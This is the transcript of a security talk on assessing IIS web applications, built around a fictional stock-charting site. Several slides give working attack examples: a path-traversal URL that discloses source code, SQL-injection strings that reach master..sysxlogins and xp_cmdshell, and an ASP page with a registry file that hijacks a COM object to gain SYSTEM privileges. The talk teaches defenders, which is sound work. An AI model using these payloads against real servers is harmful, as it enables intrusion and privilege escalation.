1 / 28

Application Assessments on IIS

Application Assessments on IIS. Welcome!. David Litchfield. (d.litchfield@atstake.com). What is an Application Assessment?. Part of a network vulnerability assessment. Application provides the site functionality. Application is least tested but often proves to be the greatest risk.

pisces
Download Presentation

Application Assessments on IIS

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Application Assessments on IIS

  2. Welcome! David Litchfield (d.litchfield@atstake.com)

  3. What is an Application Assessment? Part of a network vulnerability assessment Application provides the site functionality Application is least tested but often proves to be the greatest risk

  4. Vulnerability Scanners • Cybercop • I. S. S. • Cerberus Internet Scanner

  5. What scanners do do They highlight known vulnerabilities in COTS products Webhits.dll and null.htw MSADC and RDS Ism.dll and .htr overflow %C0%AF UNICODE issue

  6. What scanners don’t do They won’t assess your application

  7. Assessing the Application What services does the site offer? What functionality exists to provide these services? What drives this functionality? How does it do this?

  8. Stocks-r-us.com • Free charting service of current/real-time market trends • A subscriber service providing detailed market analysis • An “I’ve forgot my password” service • A contact service • Apply for a job with stocks-r-us.com online service

  9. Free charting service of current/real-time market trends • From a web form a user chooses the stock market • They also choose a time range • On Submitting a page called read_img.asp returns a graph • of the ups and downs of the market: http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=

  10. Exception Handling ASP Error 800814: Create object failed in /includes/olectra.inc Downloading the .inc file reveals nothing but there are two issues here: bad exception handling and .inc has not been mapped to asp.dll A search on google reveals Olectra Chart

  11. Source code revelation! Olectra creates a virtual directory called /octemp When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008” The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png /read_img.asp?IDN=../&IFN=read_img&IFE=asp

  12. SQL Queries strSQL = “select price from stocks where name = ‘” _ & request.querystring(“company”) & “’” This code is insecure!!! Why?

  13. By setting the “company” parameter to something such as: ISSX’ select * from master..sysxlogins Would execute the two queries in batch mode: Select price from stocks where name= ‘ISSX’ Select * from master..sysxlogins ‘sa’ login on MS SQL Server xp_cmdshell extended stored procedure

  14. On its own, ASP will not escape a single ‘ (quote mark) .idc files will. Change all ‘s provided in a parameter to 0x27 or strip them out

  15. Consideration for integer input strSQL = “Select company from stocks where price > “ & request.querystring(“price”) Again we can insert an arbitrary SQL query here and have it execute.

  16. Verifying numeric input IsNumeric() for VBScript NaN() fro JScript

  17. r.f.p – Rain Forest Puppy http://www.wiretrip.net/rfp

  18. Contact Service <% .. SMTPObj = GetObject( “IIS://” & request.servervariables(“SERVER_NAME”) & “/SMTPSVC”) .. %>

  19. HTTP SERVER_NAME Poisoning “Host:” HTTP Client Header field • Learn the password hash for the IWAM account • Enumerate SQL servers • Proxy attacks • Samples on IIS • ADSI, Corba and COM

  20. On-line job application service As part of this service stocks-r-us.com allow uploading of Curriculum Vitaes / Resumes Client Side checking doesn’t work Scripting enabled on the /cvtemp virtual directory

  21. Gaining SYSTEM Privileges using ASP • IIS Security Model • IUSR and IWAM accounts

  22. Wscript.Shell Object • WSObj = CreateObject(“wscript.shell”) • Read from the Registry • Write to the Regsitry • Execute commands

  23. MSI.ASP <% Dim WshShell, strCMD, result strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg" strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi" Set WshShell = Server.CreateObject("Wscript.Shell") On Error Resume Next result = WshShell.Run(strCMD) result = WshShell.Run(strCMD2) %>

  24. MSI.REG REGEDIT4 [HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32] @="c:\\inetpub\\wwwroot\\foo.dll" "ThreadingModel"="Both"

  25. Summary • Understand the technology you’re dealing with • Never trust user input – anywhere • Ensure permissions are set properly • Don’t trust third-party software until truly evaluated • Don’t rely on client side checking • Scanners won’t find these problems – you will

  26. Questions?

  27. Thanks and enjoy the rest the day!

More Related